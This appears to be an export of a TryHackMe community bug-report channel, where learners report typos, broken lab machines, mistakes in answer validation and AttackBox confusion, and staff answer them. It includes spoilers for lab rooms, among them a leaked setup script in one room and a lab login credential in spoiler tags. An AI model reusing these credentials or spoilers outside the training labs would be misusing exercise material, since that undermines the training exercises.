I got an Error 405 Message: Method Not Allowed when trying to access to the website with all the config done

Do you have an anonymising VPN running alongside your THM VPN?

That box hasn't changed in a long time (like, well over a year) -- there hasn't been an opportunity for the box itself to break, so it's either the VPN or something at your end

NO

I still have the same issue when working directly on the AttackBox

Just checking it now

What's the IP for your deployed machine?

The one in the screenshot isn't even active

I confirm that a few month ago when I started that room there were no issues

I also set up the AttackBox directly to work with it but I am still having the same issue

I just deployed a new one 10.10.195.9

Now this is interesting. I can replicate the 405 in your box, but not in the one I deployed from the backend. That might be a resource thing, although how, I do not know

One sec

Do you mean that you deployed a box but not getting a 405 error but from mine you are getting it ?

Yep

Try it with 10.10.252.87

That won't expire, so I'm not leaving it up, but it demonstrates

I gave it more resources than the one in the room gets, which is why I'm thinking it might be a resource thing

This is the wrong box

What the heck

It's working now

Yes, it will work with that. I deployed it myself

OK. Thanks

I will closed that room with it.

Gave +1 Rep to @obsidian kiln

Are you sure that 10.10.195.9 is attached to Upload Vulns?

Can you screenshot the box at the top of the room?

Yes

I'm killing it in a minute because it's a manually deployed box that doesn't expire -- I just started that to test

OK

Oh, I know what you're doing

I don't understand, please

You're trying to connect to the AttackBox

That's why you're getting a 405 -- it's a websocket thing

Also why RDP is open...

10.10.195.9 is the AttackBox IP

Ohhhh I start to understand

In your screenshot here you haven't actually started the machine in the room

Click the green "start machine" button

I just did it

@obsidian kiln it's OK now
I hadn't differentiated the AttackBox from the Room machine.

Thank you

Gave +1 Rep to @obsidian kiln

Np 🙂

Usually 405 means they're entering the IP of an attackbox.

Ah you got to that

Were can i post this question ?

This isn't a bug.
Why can't you upload another version?

Thank you for reply , i posted it on site-bugs and got a respond.
I fixed it .

Gave +1 Rep to @eternal summit

I may have found a potential typo in the room Pre Security > Network Fundamentals > Extending Your Network > Firewalls 101. The Hint for Question 1 "What layers of the OSI model do firewalls operate at?" is a bit confusing. It says:

Provide the layers, replacing the following "x" and "y" with the appropriate layer in descending order (i.e. 1,2): Layer x,Layer y

However, both the correct answer and the example show numbers in ascending order. 😅

I would post screenshot but I seem unable to do so.

i think this question cant get answer .. i try do all thing
can any one check and tell me
https://tryhackme.com/room/rpburpsuite

That room is not maintained 🙂

I can't answer the question and this make i can't get certified for this path "complete bigneer "

And I get answer form searching in Google from two website and when answer tell me is not correct

• no code return 200 all return 501

would you accept just getting the answer sent to you in a dm.... strongly dislike doing it this way but if restarting the target did not fix the issue then yeah maybe that is the way to go

@wheat fractal ⬆️

I've been trying to solve the problem since 8 hours ago and I will sleep now and will try again to solve

just ping shadow if you want the answer as shadow has the correct answer saved as they completed that room about a month ago or so

But I want to make sure that the question is correct

otherwise keep going and trying to get it yourself

yeah one of the inputs should work with a code 200... if you disabled the http encoding thingies

anyway same here time for sleeps

Thank you for your help and I will try again to solve

https://tryhackme.com/room/bpnetworking

decimal to binary - task 3

i mistyped and it accepted the wrong answer as correct

9 bit binary

That's just answer tolerance

https://tryhackme.com/room/puttingitalltogether > "Other Components"

You'll come across some common databases: MySQL, MSSQL, MongoDB, GraphQL, Postgres

GraphQL is not a database 😄
Source: https://www.howtographql.com/advanced/5-common-questions/

room: https://tryhackme.com/room/avengers
task: 4

the MACHINE_IP for some reason is display as an html tag

the popover also isn't working, presumably because of the link (href)

room: https://tryhackme.com/room/avengers
task: 6

' 1=1 should be ' OR 1=1 all all instances

Not sure if its a bug or not but a few rooms now I've seen are blooded by the creators or come out already blooded. Sometimes this is a 1k of points or higher in difference. Is this meant to be like this? I imagined the score was cleared when they come out.

Usually it's an issue with caching and that's not the case on the backend

lmfao

https://tryhackme.com/room/fortress

there's the /data, readable by all users

containing a setup script, which has password hashes for the users and flags for user.txt and root.txt

it's password protected and asks for a password but you can just cat the output to see it

Typo in https://tryhackme.com/room/sysmon

https://i.imgur.com/Yl8tzhq.png

https://i.imgur.com/rymDzto.png

might want to uncomment those lines

https://i.imgur.com/2W89vjq.png

atleast it's pw protected

Room bugged or am I bugged: https://imgur.com/a/5h0vEMz?

-?

Which room is that

Linux Fundamentals Part 1

Ill get a new screen the one i presented is terrible

Think i figured it out there is a machine in that room Im guessing i shoud use, my bad! I was the bugg.

It was me who was the bugg it works now. Embracing.

https://tryhackme.com/room/nahamstore

-sql_two
+sqli_two

@rain thicket

weird nobody reported this one in 268 days

https://tryhackme.com/room/rpnessusredux Task4, last question:
What Apache HTTP Server Version is reported by Nessus? Nessus reports 2.4.25, however the only answer that seems to work is 2.4.99.

rootme is broken

Please elaborate.

In https://tryhackme.com/room/sysmon is this step, but there is no file with that name.

HI!
I have this message [!] This exploit may require manual cleanup of '%TEMP%\LVCJth.vbs' on the target on steel mountain room
I already restart the box but nothing change 😦

That's not a bug.
That is a warning, and tells you you might need to remove it for forensics purposes, covering your tracks.
If you need help with the room, #room-hints or #room-help

I would like to say even though I expect this to be ignored, using 192.168.100.x in Holo is a bad choice, that network range is used in DOCSIS / Cable modem standards. Many modems/routers will assign themselves there, and it can't be turned off.
Reference: https://www.cablelabs.com/wp-content/uploads/2015/08/CM-SP-OSSIv3.0-I05-071206.pdf or google.

Why would that be a bad choice?
You're pivoting.
Add the correct routes and you're fine

That’s not the network range. Have you actually looked at the lab? That’s just a docker network you never directly access it

room: https://tryhackme.com/room/hackernote
task: 3

i know this room is old, but the code here can't be read very easily cc @eternal summit

Yo wtf

THM breaking my room smh

Can you DM me this please?

❤️ Fixed

Hey i guess i found a bug in https://tryhackme.com/room/fileinc task 5 i cant submit my awnser for the first one ("
Give Lab #3 a try to read /etc/passwd. What is the request look like?")

Does it say “uh oh undefined?” @fair rain

it say nothing

Do you use bitdefender?

no

Do you have any anti virus?

no

all other task are working

only this one not

Have you tried refreshing your page?

ofcourse

Right click, press “inspect element”, then select the tab called “console”, try to enter the answer and see if any errors appear

when i press the submit button i receive "POST https://tryhackme.com/api/fileinc/answer net::ERR_CONNECTION_RESET" and when i write the awnser in th console i get "Uncaught SyntaxError: Unexpected token '.'"

Do you have another device that you can try submitting the answer on, such as a mobile phone?

on my mobile phone it worked

thank you very much

Hello, on the yara room, task 9

there is a python error on the Loki tool

So the tool doesn't work and we can't do the task

I think you need to call it python3

Or two try both 😄

I think not

Mhm okay

I’ll take a look at this today. Thanks

thanks 🙂

What task are you on?

Ah I see

Ignore me 😄

I tried yesterday USTOUN, but the same problem still exists. Port 1433 is not open. I even waited for almost an hour in case it would open later.

I wonder if that was a correct - https://tryhackme.com/room/contentdiscovery TASK 12

Answer tolerance!

Mah Gawd!

https://tryhackme.com/room/mitre Task 5, Mitre Shield is now Engage. None of the links work as expected. Some of the questions, like the one about DTE0011 don't make sense since it's been merged into EAC0005

Hope this is the right place, and apologies if it's a known issue. On the kubernetes TDI 2020 box, I'm just getting a connection refused message with the credentials and config file provided, and nmap doesn't find anything on port 6443. (Or any port apart from 22). I've given it 30+ minutes to start while watching the video. If anyone can confirm if it's a problem with the box, I'd appreciate it, as I really need to improve my understanding and this looks like a very good lesson.

I think the network services room is broken all of the pictures dont show up, not a big deal but I really don't know what I'm missing out on

room: https://tryhackme.com/room/activerecon
task: 6

You can find a recording of the process below.

there is no video

room: https://tryhackme.com/room/nmap01
task: 2

in the current simulation, a broadcast from computer1 repeats the packet back to computer1 which is incorrect, a broadcast doesn't repeat out the same port that it came in on

room: https://tryhackme.com/room/nmap01
task: 3

there's an extra .13 in these IPs

room: https://tryhackme.com/room/nmap01
task: 5

port-scanning should be ping-scanning where underlined

hey guys, found a dead link within one of your tutorial rooms "google dorking"
https://tryhackme.com/room/googledorking

http://googledorking.cmnatic.co.uk/ <- deadlink

have a nice day everybody!

cheers

@dusky junco

typo in https://tryhackme.com/room/hololive

Hello, experiencing the same here with the Kubernetes TDI 2020 box (https://tryhackme.com/room/kuberneteschalltdi2020). Trying out kubectl commands using the kubeconfig file just returns Connection refused messages at port 6443. Not sure if it's a known issue or maybe I'm just missing something 😅 Could anyone kindly confirm? Would appreciate any response

Hi @glad badger , has the Yara room (https://tryhackme.com/room/yara), task 11 question 6 been fixed? The question is:
"Back to Valhalla, inspect the Info for this rule. Under Statistics what was the highest rule match per month in the last 2 years? (YYYY/M)". Valhalla only shows 2 years of history, and the room is now 484 days old. I tried two different "YYYY/M" values from the current statistics and neither were accepted.

It let me enter the answer with .eve instead of .exe

Not sure if this counts as bug. But it shouldn't let me do that.

Windows Fundamentals 2 Task 3

Hi, I don't know if its a bug or if i'm doing something wrong here, but on the anonymous box, i can't take reverse shell, I'm pretty confident I did everything right, i saw some writeups and they did the same but nothing. Any help?

Nah, Thats just the error margin for typos

Ahh... okay 🙂

@wheat fractal Might be better posting in #room-help

thank you, will do

Gave +1 Rep to @sonic rover

Hi. Please can you repare the room "zero logon". I am trying to access it it is not possible. The page is broken AGAIN. It does not load.

Will the room "zero logon" be repaired?

This is not a bug with the room, this is a site bug.
The room does not need repairing. Report it in #site-bugs

room: https://tryhackme.com/room/linprivesc
task: 2

it's -> its

i alwasy when using tryhackme

its machines dont accept port 22

Which rooms/machines do you mean? There's no guarantee that target machines accept ssh connections at all. You may try the #room-help or #room-hints channels for help on a specific room.

Hello guys, in network services room , task 4: Exploiting SMB. The picture is not loaded, could you guys fix it?

There may be a bug in the NMAP live host discovery room. I am answering the questions correctly (I've even checked my answers looking up cheat sheets on the internet to confirm my answers) and it's not accepting them. Can I post the answers I am putting in and at least have someone confirm if there's something obvious that I'm missing?

nm, reloaded pages and answers now work

Hello, in the room https://tryhackme.com/room/xssgi, task 7

Every payload failed, even the payload in the demo

LinPrivesc Room; Task: Privilege Escalation: Cron Jobs:
Question: How many cron jobs can you see on the target system?

It is either question is phrased wrongly (how many non-default cron jobs?) or it a mistake in answer.
Correct answer should be 8 since there are 4 defaults (run-parts & anacron) & 4 created by the user. But in Room currently correct answer appears to be ||4|| ?

Hi there, are the KotH points also contributing to the monthly scores?

They do not, no

KOTH points are only for that one KOTH game

In overpass 1 there is a issue when using attack box, or this could be an attackbox problem

||Due to privesc requiring modification to an ip and not being allowed to supply port numbers, it requires really strange work arounds

This wouldn’t be an issue usually, but the attack box is by default using port 80 for something||

Correct.
This is not a room bug though. This is an attackbox bug.
You can SSH into the attackbox and kill the service on port 80.

My solution was to just download the ovpn pack and quickly host and call to that but I guess I learnt something new

Room: https://tryhackme.com/room/pentestingfundamentals
Issue: The index should be 6 instead of 7

Complete the advent or cyber 2 form but I didn't receive the last flag

https://tryhackme.com/room/activedirectorybasics|
Is this a bug? Pretty sure it should be correct

your answer is wrong... @split mulch

it is close though but not correct

read the question more closely again and then read the list of users and groups

Ohh,dammit, my bad 😄
Thanks @rugged canyon!

Gave +1 Rep to @rugged canyon

no problem.... hope that was a good learning experience

Overall experience is great, if we are not looking at some fails such as this 😄

Hey!
BTW, if an answer says it's incorrect, try avoid spamming just in-case our anti-cheat detection kicks in and blocks you from answering questions:)

Not sure what triggers it but just in-case^^

Hello everyone,

not sure if this is a bug but on the complete beginner room Nmap task 14 is asking for number of open|filtered ports, when running the command on the attack box the number of open|filtered ports is 997 which is giving me an incorrect answer

Alright, thanks for letting me know 😉

Gave +1 Rep to @hazy tiger

trying to load up http://10.10.169.100:3000 from https://tryhackme.com/room/25daysofchristmas seems to hang, but i can ping it just fine. Service might need restarting perhaps?

my python script for it gets timeouts too

Its not precisely a bug but it is against the 15 minute "rule".
In the Room Mr Robot Ct, the Elliot's password in fsocity.dic is almost near the end of the file.
My poor wooden PC even with -t 50 was unable to find it even after 3 hours.
As a #suggestion please put it a little higher.

cc @glad badger

OWASP Juice Shop room, Task 6, Question 3 "Remove all 5-star reviews!" - the page is not showing any five star reviews. Instead you delete a four-star review and it gives you the flag anyway. Not a major bug but thought i'd mention it here as it could confuse some people.

could you explain more your tip ?

Not really, unless you say what you are finding unclear.

i don't know how can i use ssh to solve this problem of port 80 already used

i never did ssh tunneling, that is the method to use ?

No. No tunnelling.

You SSH into the attackbox to get a command line.
You use this command line to kill the process running on port 80.
You then use the command line to complete the room.

if i kill the process running on port 80, THM will crash

No, it will kill the VNC

Hence why you SSH

THM does not crash.
You lose access to the remote desktop.
You still have access over SSH, which is the whole point.

if VNC crash i don't have any access to either SSH nor attackbox

i don't use openvpn

Then you might need to

It's SSH on the attackbox. If you're a subscriber, the attackbox has a public IP

is anyone else struggling to launch an attack box? Mine was fine all day but now I cannot get it to connect

I have the same issue. server ping's, but I can't talk to it with python/telnet

I wasn't sure where to post this since it's not really a bug, but in the OWASP juice shop on task 4 question 2, the last sentence of the first paragraph it says Jame T. Kirk instead of James. Not a gamebreaker, just me being nitpicky.

Hello. I joined USTOUN room today and after I found some stuff, I completely stuck. So I started checking up Write-Ups. In the write-ups, everyone mentiones a mssql port which I couldn't find. I already restart the machine twice but it still doesn't show up. Anybody have any ideas?

@glad badger I think this might have lost the resource boost

Again

Ahoy there. In the Windows Fundamentals 1 room - Task 2, the first sentence of the second paragraph appears to not have a proper ending to it, “Windows XP was a popular version of Windows and had a long-running.”

Also, later in that same task it is mentioned, “Then arrived Windows 10, which is the current Windows operating system…” That may want to be updated to Windows 11 as the upgrades role out.

#Alfred
Task 3 last question
The root.txt flag is not in the config directory, I have also tried searching for it in the whole filesystem. Anyone have had the same problem?

The room tells you to migrate, you absolutely must do that otherwise Windows pretends the flag does not exist.

We don’t claim Windows 11.

Thanks for that clarification. I was trying to do the room without Metasploit. Is there a way to migrate without Metasploit?

Gave +1 Rep to @eternal summit

There is.
Probably not useful here.

thanx man .

Many rooms that use web applications use fonts.googleapis.com. These fonts cannot be loaded because there is no internet connection and therefore the page takes a very long time to load. Is there a solution for this?

LazyAdmin room [https://tryhackme.com/room/lazyadmin], was it intended to already have msfvenom payload there in specific .sh ?

same, but if you do nmap without -p- it will show 2

try -sV

Gave +1 Rep to @zenith mortar

If it's in the AttackBox, put this into /etc/hosts:
127.0.0.1 fonts.googleapis.com

It will still error out, but it won't take long to do it.

Thanks, that is a nice solution

Gave +1 Rep to @obsidian kiln

Np

Hi there 🙂
In the new Password Attacking room (Task 2), the last sentence is missing a word. "Once passwords are obtained, the attacker can password attacks techniques to crack these encrypted or hashed passwords using various tools." Probably 'utilize' or so 🙂 (https://tryhackme.com/room/passwordattacks)

In the same room, at the beginning of Task 3: "targetted" is written with just one "t".

Task 3, first text block, The headline should be "Customized Wordlists". And in the last sentence, it should be "..which may be used.."

Also, the first sentence in the second block is missing an "a". Maybe someone can read through that room again 🙂

@glad badger, that's an internally devved one 🙂

I'm fixing those problems because I already have it up, but it might be a good idea to go through the thing and have Yasir sort anything else 🙂

@obtuse muskSorted those problems -- keep 'em coming if you find any more 🙂

Same room, same task, the fist part of each of these two blocks have a lighter form. Meaning they are thinner.

How the absolute f*ck did you notice that?!?!

¯_(ツ)_/¯ and a bit of magic

room-bugbounty

Oh, fo sho... lol

The same applies a bit further down:

The 'a' in front of 'crunch' in the last sentence is too much.

Task 4, a bit further down, the "that" should be "and".

Task 6, just under the first picture, the sentence should say, "We can see that we have many rules that are available for us to use.".

fixed this and the above. thanks

Gave +1 Rep to @obtuse musk

In the advent of cyber room the linkedin link just goes to imgur

https://tryhackme.com/room/adventofcyber3

I have fixed this tyty

Anyone else getting a 502 on file inclusion?

The new "Password Attacks" room. Task 9's question hint should be "month + year + special character" not "season + year + special character" (I believe after completing the room)

What password did you get?

(Preferably in a spoiler tag, but I can delete anyway)

I think this is how you do it but ||November2021!||

That got you logged in?

If so then yeah, the hint is wrong.

It did yes ||pittman:November2021!|| is in my notes

@glad badger ^^
Either way that question ain't gonna be doable in a month, Tim, given it's asking for the current season (well, actually month but the hint is wrong), and, uh, I doubt Yasir intends to update the box and question every month.
Unless there is an autogen in play, in which case kudos, but, if experience is anything to go by I somewhat doubt that. :)

Hello. I found a bug in Windows Fundamentals 2. In "change UAC settings" my answer had typo but still was accepted. I have a picture of this, but can't share it here. Where can I send it? Or you just want me to describe my answer?

Verify to send pictures :)

!docs verify

Thank you for information 🙂
This is the picture of the bug

Gave +1 Rep to @obsidian kiln

As you can see, there is a typo in answer. It should be settings not settingd, but this answer still was accepted

Hi there 🙂
In the Password Attack room (https://tryhackme.com/room/passwordattacks) Task 9, just under the last picture before RDP, there's a typo in the sentence: It says "Sprint2021" (with a t ) instead of "Spring2021" (with a g ).

That is answer tolerance -- it's just part of the site :)